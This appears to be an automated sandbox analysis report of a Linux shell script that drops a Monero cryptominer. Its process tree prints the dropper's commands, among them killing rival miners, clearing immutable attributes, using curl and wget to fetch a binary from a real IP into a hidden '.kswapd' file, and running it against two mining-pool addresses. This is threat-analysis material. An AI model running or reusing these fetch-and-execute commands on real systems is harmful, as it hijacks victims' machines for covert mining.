5a7a5f792a6cb4a38d7cb0a61fa5e3e3c3dabaf11159404613c3dbb5cf13ad48

General

Target

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Size

5KB
MD5

7b72cf30ac42c20f0a14b0b87425c00a
SHA1

74402152ac0f0c9dfed6f76975080ce1d0d4584d
SHA256

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
SHA512

1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
SSDEEP

96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

.kswapd

ioc pid process

/.cache/.kswapd 907 .kswapd

ioc	pid	process
/.cache/.kswapd	907	.kswapd

Attempts to change immutable files 20 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

grepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepchattrgrepgrepgrepgrepgrepgrepgrepgrep

pid	process
889	grep
809	grep
817	grep
821	grep
833	grep
857	grep
805	grep
861	grep
869	grep
845	grep
849	grep
763	chattr
813	grep
825	grep
829	grep
837	grep
841	grep
853	grep
865	grep
884	grep

Enumerates running processes
Discovers information about currently running processes on the system
Write file to user bin folder 1 TTPs 1 IoCs

Hijack Execution Flow
T1574

Processes:

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description ioc process

File opened for modification /usr/local/bin/.fYd3diJL 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description	ioc	process
File opened for modification	/usr/local/bin/.fYd3diJL	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

Reads CPU attributes 1 TTPs 4 IoCs

System Information Discovery

T1082

Processes:

pspspsps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspsps

description	ioc	process
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/374/status	ps
File opened for reading	/proc/76/cmdline	ps
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/75/cmdline	ps
File opened for reading	/proc/76/stat	ps
File opened for reading	/proc/76/status	ps
File opened for reading	/proc/774/stat	ps
File opened for reading	/proc/782/status	ps
File opened for reading	/proc/stat	ps
File opened for reading	/proc/5/stat	ps
File opened for reading	/proc/20/cmdline	ps
File opened for reading	/proc/349/cmdline	ps
File opened for reading	/proc/71/stat	ps
File opened for reading	/proc/20/status	ps
File opened for reading	/proc/13/stat	ps
File opened for reading	/proc/775/stat	ps
File opened for reading	/proc/770/stat	ps
File opened for reading	/proc/765/stat	ps
File opened for reading	/proc/81/cmdline	ps
File opened for reading	/proc/self/stat	ps
File opened for reading	/proc/377/status	ps
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/669/status	ps
File opened for reading	/proc/780/stat	ps
File opened for reading	/proc/320/cmdline	ps
File opened for reading	/proc/657/stat	ps
File opened for reading	/proc/744/status	ps
File opened for reading	/proc/20/cmdline	ps
File opened for reading	/proc/657/status	ps
File opened for reading	/proc/794/status	ps
File opened for reading	/proc/6/cmdline	ps
File opened for reading	/proc/352/cmdline	ps
File opened for reading	/proc/2/cmdline	ps
File opened for reading	/proc/24/stat	ps
File opened for reading	/proc/378/stat	ps
File opened for reading	/proc/151/stat	ps
File opened for reading	/proc/15/status	ps
File opened for reading	/proc/684/cmdline	ps
File opened for reading	/proc/17/status	ps
File opened for reading	/proc/37/status	ps
File opened for reading	/proc/691/stat	ps
File opened for reading	/proc/82/stat	ps
File opened for reading	/proc/770/cmdline	ps
File opened for reading	/proc/145/stat	ps
File opened for reading	/proc/117/status	ps
File opened for reading	/proc/685/status	ps
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/660/stat	ps
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/16/status	ps
File opened for reading	/proc/36/status	ps
File opened for reading	/proc/166/cmdline	ps
File opened for reading	/proc/9/cmdline	ps
File opened for reading	/proc/82/cmdline	ps
File opened for reading	/proc/145/status	ps
File opened for reading	/proc/659/cmdline	ps
File opened for reading	/proc/776/cmdline	ps
File opened for reading	/proc/7/stat	ps
File opened for reading	/proc/18/cmdline	ps
File opened for reading	/proc/757/cmdline	ps
File opened for reading	/proc/699/stat	ps
File opened for reading	/proc/10/cmdline	ps
File opened for reading	/proc/12/status	ps

Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.

Processes:

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description ioc process

File opened for modification /dev/shm/.fYd3diJL 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description ioc process

File opened for modification /tmp/.fYd3diJL 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description	ioc	process
File opened for modification	/dev/shm/.fYd3diJL	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description	ioc	process
File opened for modification	/tmp/.fYd3diJL	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
1⤵
- Write file to user bin folder
- Writes file to shm directory
- Writes file to tmp directory
PID:692

/bin/uname
uname -a
2⤵
PID:696

/bin/grep
grep " rm does not remove dir"
2⤵
PID:702

/bin/rm
rm --help
2⤵
PID:701

/usr/bin/wc
wc -l
2⤵
PID:704

/bin/grep
grep -i "Dump libcurl equivalent"
2⤵
PID:709

/usr/bin/curl
curl --help
2⤵
PID:708

/usr/bin/wc
wc -l
2⤵
PID:710

/bin/grep
grep -i "wgetrc "
2⤵
PID:719

/usr/bin/wc
wc -l
2⤵
PID:721

/usr/bin/wget
wget --version
2⤵
PID:718

/usr/bin/head
head /dev/urandom
2⤵
PID:726

/usr/bin/tr
tr -dc A-Za-z0-9
2⤵
PID:727

/usr/bin/shuf
shuf -i 4-16 -n 1
2⤵
PID:730

/usr/bin/head
head -c 8
2⤵
PID:728

/bin/rm
rm -f /tmp/.fYd3diJL
2⤵
PID:734

/bin/rm
rm -f /tmp/.fYd3diJL
2⤵
PID:736

/bin/rm
rm -f /usr/local/bin/.fYd3diJL
2⤵
PID:738

/bin/rm
rm -f /dev/shm/.fYd3diJL
2⤵
PID:739

/bin/rm
rm -f /.fYd3diJL
2⤵
PID:740

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:742

/bin/grep
grep -v grep
2⤵
PID:743

/bin/grep
grep -v defunct
2⤵
PID:744

/bin/grep
grep -v "sh "
2⤵
PID:745

/bin/grep
grep " sleep 120"
2⤵
PID:746

/usr/bin/wc
wc -l
2⤵
PID:747

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:752

/bin/grep
grep -v grep
2⤵
PID:753

/bin/grep
grep -v "sh "
2⤵
PID:754

/bin/grep
grep -v defunct
2⤵
PID:755

/bin/grep
grep " sleep 120"
2⤵
PID:756

/usr/bin/wc
wc -l
2⤵
PID:757

/bin/sleep
sleep 120
2⤵
PID:761

/bin/mkdir
mkdir -p /.cache/
2⤵
PID:762

/usr/bin/chattr
chattr -i /.cache/
2⤵
- Attempts to change immutable files
PID:763

/bin/chmod
chmod 1755 /.cache/
2⤵
PID:764

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:766

/bin/grep
grep -v l0
2⤵
PID:767

/bin/grep
grep -v eth1
2⤵
PID:768

/bin/grep
grep -v lan0
2⤵
PID:769

/bin/grep
grep -v "^-"
2⤵
PID:770

/bin/grep
grep -v eth0
2⤵
PID:771

/bin/grep
grep -v inet0
2⤵
PID:772

/bin/grep
grep -v lano
2⤵
PID:773

/bin/grep
grep -v grep
2⤵
PID:774

/bin/grep
grep -v defunct
2⤵
PID:775

/bin/grep
grep -v knthread
2⤵
PID:776

/bin/grep
grep -vi aaaaaaaaaa
2⤵
PID:777

/bin/grep
grep -vi "java "
2⤵
PID:778

/bin/grep
grep -vi jenkins
2⤵
PID:779

/bin/grep
grep -vi exim
2⤵
PID:780

/usr/bin/head
head -n 1
2⤵
PID:782

/usr/bin/awk
awk "{if(\$3>=54.0) print \$11}"
2⤵
PID:781

/bin/grep
grep -v l0
2⤵
PID:786

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:785

/bin/grep
grep -v eth1
2⤵
PID:787

/bin/grep
grep -v lan0
2⤵
PID:788

/bin/grep
grep -v "^-"
2⤵
PID:789

/bin/grep
grep -v eth0
2⤵
PID:790

/bin/grep
grep -v inet0
2⤵
PID:791

/bin/grep
grep -v lano
2⤵
PID:792

/bin/grep
grep -v grep
2⤵
PID:793

/bin/grep
grep -v defunct
2⤵
PID:794

/bin/grep
grep -v python
2⤵
PID:795

/bin/grep
grep -v knthread
2⤵
PID:796

/bin/grep
grep -vi aaaaaaaaaa
2⤵
PID:797

/bin/grep
grep -vi bash
2⤵
PID:798

/bin/grep
grep -vi exim
2⤵
PID:799

/usr/bin/awk
awk "{if(\$3>=0.0) print \$2}"
2⤵
PID:800

/usr/bin/uniq
uniq
2⤵
PID:801

/bin/readlink
readlink /proc/320/exe
2⤵
PID:803

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/320/exe
2⤵
- Attempts to change immutable files
PID:805

/bin/readlink
readlink /proc/323/exe
2⤵
PID:807

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/323/exe
2⤵
- Attempts to change immutable files
PID:809

/bin/readlink
readlink /proc/349/exe
2⤵
PID:811

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/349/exe
2⤵
- Attempts to change immutable files
PID:813

/bin/readlink
readlink /proc/350/exe
2⤵
PID:815

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/350/exe
2⤵
- Attempts to change immutable files
PID:817

/bin/readlink
readlink /proc/352/exe
2⤵
PID:819

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/352/exe
2⤵
- Attempts to change immutable files
PID:821

/bin/readlink
readlink /proc/374/exe
2⤵
PID:823

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/374/exe
2⤵
- Attempts to change immutable files
PID:825

/bin/readlink
readlink /proc/377/exe
2⤵
PID:827

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/377/exe
2⤵
- Attempts to change immutable files
PID:829

/bin/readlink
readlink /proc/378/exe
2⤵
PID:831

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/378/exe
2⤵
- Attempts to change immutable files
PID:833

/bin/readlink
readlink /proc/392/exe
2⤵
PID:835

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/392/exe
2⤵
- Attempts to change immutable files
PID:837

/bin/readlink
readlink /proc/653/exe
2⤵
PID:839

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/653/exe
2⤵
- Attempts to change immutable files
PID:841

/bin/readlink
readlink /proc/657/exe
2⤵
PID:843

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/657/exe
2⤵
- Attempts to change immutable files
PID:845

/bin/readlink
readlink /proc/684/exe
2⤵
PID:847

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/684/exe
2⤵
- Attempts to change immutable files
PID:849

/bin/readlink
readlink /proc/685/exe
2⤵
PID:851

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/685/exe
2⤵
- Attempts to change immutable files
PID:853

/bin/readlink
readlink /proc/689/cwd
2⤵
PID:854

/bin/cat
cat /proc/689/comm
2⤵
PID:855

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy
2⤵
- Attempts to change immutable files
PID:857

/bin/readlink
readlink /proc/690/cwd
2⤵
PID:858

/bin/cat
cat /proc/690/comm
2⤵
PID:859

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump
2⤵
- Attempts to change immutable files
PID:861

/bin/readlink
readlink /proc/691/cwd
2⤵
PID:862

/bin/cat
cat /proc/691/comm
2⤵
PID:863

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma
2⤵
- Attempts to change immutable files
PID:865

/bin/readlink
readlink /proc/695/exe
2⤵
PID:867

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/695/exe
2⤵
- Attempts to change immutable files
PID:869

/bin/readlink
readlink /proc/699/exe
2⤵
PID:881

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/699/exe
2⤵
- Attempts to change immutable files
PID:884

/bin/readlink
readlink /proc/761/exe
2⤵
PID:887

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/761/exe
2⤵
- Attempts to change immutable files
PID:889

/bin/grep
grep x86_64
2⤵
PID:893

/usr/bin/wc
wc -l
2⤵
PID:894

/usr/bin/curl
curl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd
2⤵
PID:897

/usr/bin/wget
wget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd
2⤵
PID:902

/bin/chmod
chmod +x /.cache/.kswapd
2⤵
PID:906

/.cache/.kswapd
/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B
1⤵
- Executes dropped EXE
PID:907

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Hijack Execution Flow

1

T1574

Privilege Escalation

Hijack Execution Flow

1

T1574

Defense Evasion

Hijack Execution Flow

1

T1574

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/.fYd3diJL
Filesize
9B

MD5
ca4f95a3b88d33571504c0c4918c3a61

SHA1
8fb9bd148f0618caa1b09a0817aa26ebd7ff00e3

SHA256
20571736a3d21de70769ff71883303646210f51be9b10a6e017e67b488e2e7ba

SHA512
3b025f820b3effb09fd0d19d0cf92db8a3efa6d41df4a534f09daa2a16f2b05b8f0880e4c18512c1fc886b03c991719b172d6aaa7330e1d7480c1297400a89b3

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads